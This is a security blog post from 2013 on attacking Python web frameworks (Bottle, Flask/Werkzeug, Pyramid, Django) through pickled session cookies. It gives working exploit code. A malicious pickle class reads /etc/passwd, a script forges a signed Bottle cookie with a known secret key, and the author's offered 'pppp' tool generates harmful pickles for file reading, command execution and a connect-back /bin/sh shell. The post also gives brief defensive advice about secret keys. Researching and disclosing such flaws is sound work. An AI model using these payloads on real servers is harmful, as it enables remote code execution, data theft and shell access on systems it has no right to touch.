Balda's place

Tags

Python web frameworks and pickles

Published on 23 June 2013


TL;DR Tool is available here pppp.tar.gz

During the talk Shenril and I made at Nuit du hack , I spoke about ways to exploit various Python web frameworks using pickle as data serializer. In this post, I'll try to present as much information about the way this happens and the ways to exploit it.

Let's get back to the basics :

Pickle

Pickle is a Python module used to serialize data, but contrarily to JSON or YAML, it allows to serialize objects properties but also methods. In most of the cases, this is not a problem, but one can also serialize an object with code in the __reduce__() method, which is called when the object is unpickled.

import pickle
import subprocess

class test(object):
    def __reduce__(self):
        return (subprocess.check_output, (('cat','/etc/passwd'),))

a = pickle.dumps(test())
print a
"csubprocess\ncheck_output\np0\n((S'cat'\np1\nS'/etc/passwd'\np2\ntp3\ntp4\nRp5\n."
b = pickle.loads(a)
print b
'root:x:0:0:root:/root:/bin/bash\n[...]'

Using this method, it is possible to see the pickled object, but it is also possible to look how pickle internal VM treats each instruction with the pickletools.dis() method

>> pickletools.dis(a)
    0:  c    GLOBAL     'subprocess check_output'
    25: p    PUT        0
    28: (    MARK
    29: (        MARK
    30: S            STRING     'cat'
    37: p            PUT        1
    40: S            STRING     '/etc/passwd'
    55: p            PUT        2
    58: t            TUPLE      (MARK at 29)
    59: p        PUT        3
    62: t        TUPLE      (MARK at 28)
    63: p    PUT        4
    66: R    REDUCE
    67: p    PUT        5
    70: .    STOP
highest protocol among opcodes = 0

I won't get any further on pickle opcodes, as there is a lot of information already available on the Internet for this :

Web frameworks and pickle

Well, several Python web frameworks do provide a way to store session information in cookies that are sent back to the user. Generally, these cookies contain a pickled representation of a list or a dictionary of values stored in the user session. For instance, let's create a small application with the Bottle framework :

from bottle import route, run, response, request, HTTPResponse

@route('/')
def main():
    value = request.get_cookie('account', secret='SecretK3y')
    if value:
        return value

@route('/set')
def set():
    resp = HTTPResponse(status=303)
    resp.set_header('Location','/')
    resp.set_cookie('account', 'Admin', secret='SecretK3y')
    return resp

run(host='127.0.0.1', port=8080, debug=True, reloader=True)

This simple application allows to set a cookie when the user gets on the /set route and displays the value content when he gets on /.

Accessing the /set URL, the server responds with the following header :

Set-Cookie: account="!Xgen4B8bNpwWRNltHcfaZQ==?gAJVB2FjY291bnRxAVUFQWRtaW5xAoZxAy4="

To know how this cookie is constructed by Bottle, let's check its source code :

#bottle.py
def cookie_encode(data, key):
    ''' Encode and sign a pickle-able object. Return a (byte) string '''
    msg = base64.b64encode(pickle.dumps(data, -1))
    sig = base64.b64encode(hmac.new(tob(key), msg).digest())
    return tob('!') + sig + tob('?') + msg

By decoding the last part of the cookie, we can find the way data is stored in it :

>>> import pickle
>>> pickle.loads('gAJVB2FjY291bnRxAVUFQWRtaW5xAoZxAy4='.decode('base64'))
('account', 'Admin')

So the session variables are stored in a tuple. Great ! Now let's force a cookie with the malicious pickle we created before :

import pickle, subprocess, base64, hmac

class test(object):
    def __reduce__(self):
        return (subprocess.check_output, (('cat','/etc/passwd'),))

p=pickle.dumps(('account',test()))
msg = base64.b64encode(p)
sig = base64.b64encode(hmac.new('SecretK3y', msg).digest())
print '!'+sig+'?'+msg
!IGOy9wZDbDQZU5onzz/5Bg==?KFMnYWNjb3VudCcKcDAKY3N1YnByb2Nlc3MKY2hlY2tfb3V0cHV0CnAxCigoUydjYXQnCnAyClMnL2V0Yy9wYXNzd2QnCnAzCnRwNAp0cDUKUnA2CnRwNwou

Now if we replace the cookie value by what we just generated, and get to the /show page again, the output of the page will be the content of the /etc/passwd file of the server.

Affected web frameworks

Bottle is not the only web framework that uses pickle as a data serializer. Nearly all of them do support it. So far, I've successfully checked and exploited this vulnerability in the following frameworks :

  • Bottle, as we saw it
  • Werkzeug / Flask
  • Pylons / Pyramid
  • Django

Flask

Nearly the same as Bottle. The cookie generation code is here :

#contrib/securecookie.py
def serialize(self, expires=None):
    """Serialize the secure cookie into a string.

    If expires is provided, the session will be automatically invalidated
    after expiration when you unseralize it. This provides better
    protection against session cookie theft.

    :param expires: an optional expiration date for the cookie (a
                    :class:`datetime.datetime` object)
    """
    if self.secret_key is None:
        raise RuntimeError('no secret key defined')
    if expires:
        self['_expires'] = _date_to_unix(expires)
    result = []
    mac = hmac(self.secret_key, None, self.hash_method)
    for key, value in sorted(self.items()):
        result.append('%s=%s' % (
            url_quote_plus(key),
            self.quote(value)
        ))
        mac.update('|' + result[-1])
    return '%s?%s' % (
        mac.digest().encode('base64').strip(),
        '&'.join(result)
    )

Pyramid

Pyramid and Pylons are also affected :

#controllers/util.py
def signed_cookie(self, name, data, secret=None, **kwargs):
    """Save a signed cookie with secret signature

    Saves a signed cookie of the pickled data. All other keyword
    arguments that ``WebOb.set_cookie`` accepts are usable and
    passed to the WebOb set_cookie method after creating the signed
    cookie value.

    """
    pickled = pickle.dumps(data, pickle.HIGHEST_PROTOCOL)
    sig = hmac.new(secret, pickled, sha1).hexdigest()
    self.set_cookie(name, sig + base64.standard_b64encode(pickled), **kwargs)

Django

Django is certainly the most interesting one, as it uses pickle with nearly all session management backends.

The faulty code is in contrib/sessions/backend/base.py, in the SessionBase class :

def encode(self, session_dict):
    "Returns the given session dictionary pickled and encoded as a string."
    pickled = pickle.dumps(session_dict, pickle.HIGHEST_PROTOCOL)
    hash = self._hash(pickled)
    return base64.b64encode(hash.encode() + b":" + pickled).decode('ascii')

And because all other backends are just subclasses of SessionBase The problem propagates to all of the backends. I only tested two of them at the moment, but the others should work as well :

  • django.contrib.sessions.backends.signed_cookies
  • django.contrib.sessions.backends.file

For instance, the file-based session backend stores the pickled data as a base64(hmac:base64(pickle)) and by default stores the files in the temp directory as set by a call to tempfile.gettempdir(), which on UNIX systems points to /tmp.

If you happen to also find an arbitrary file upload on the same server, that's good news, because using this, it is possible to upload a session file and use it to execute code.

Secret key considerations

All of these attacks rely on the knowledge of the secret key, which is normally protected by the framework, or at least hidden in the code. However, not all the frameworks are correctly warning developers about this security problem.

In practice, a simple search on Github is self-explanatory :

Note that this does not guarantees that all of these applications are vulnerable, but this proves that secret key management is not taken care of seriously.

Exploitation

As it is not that easy to generate a valid cookie or session file, I created a small script that generates valid malicious cookies for all of the aforementioned frameworks.

Its usage is really simple :

$ ./pppp.py -h
usage: pppp.py [-h] [-o {django_cookie,django_file,werkzeug,bottle,raw}]
               [-k SECRET_KEY] -p {connect_back,read_file,command_exec} -a
               ARGUMENT [-n VAR_NAME] [-m HASH_TYPE]

Generates harmful pickles for various uses (and fun)

optional arguments:
  -h, --help            show this help message and exit
  -o {django_cookie,django_file,werkzeug,bottle,raw}, --output {django_cookie,django_file,werkzeug,bottle,raw}
                        Pickle output format
  -k SECRET_KEY, --key SECRET_KEY
                        Application's secret key
  -p {connect_back,read_file,command_exec}, --payload {connect_back,read_file,command_exec}
                        Payload type
  -a ARGUMENT, --argument ARGUMENT
                        Payload's argument
  -n VAR_NAME, --name VAR_NAME
                        Var name for the pickled payload
  -m HASH_TYPE, --mac HASH_TYPE
                        (Werkzeug only) specify the hash type

For instance, to generate the malicious pickle in the Bottle example above, just type :

$ ./pppp.py -o bottle -k SecretK3y -p read_file -a /etc/passwd -n account
!OOdDHCo7esKUhSFX5Ivo4w==?KFMnYWNjb3VudCcKY3N1YnByb2Nlc3MKY2hlY2tfb3V0cHV0CigoUydjYXQnClMnL2V0Yy9wYXNzd2QnCmx0UnQu

An other, more self-explaining example, is the connect back shell that can be spawned with the following command :

$ ./pppp.py -o bottle -k SecretK3y -p connect_back -a 127.0.0.1:31337 -n account

The generated pickle will, on execution, connect to 127.0.0.1 on port 31337 and spawn a /bin/sh bound to the socket.

PPPP is available right here : pppp.tar.gz

Conclusion

This attack cannot be used everywhere, but combined with other vulnerabilities like a local file read or by knowing the source code, it becomes possible to run arbitrary code on the server quite easily.

For application developers, be very careful about the secret key used in your application and don't publish it on Github, that's REALLY a bad idea. You can also try to change the serialization method, if it's available in your framework, or use a file- or database-based method if you are sure that there is no possibility to manipulate the session data.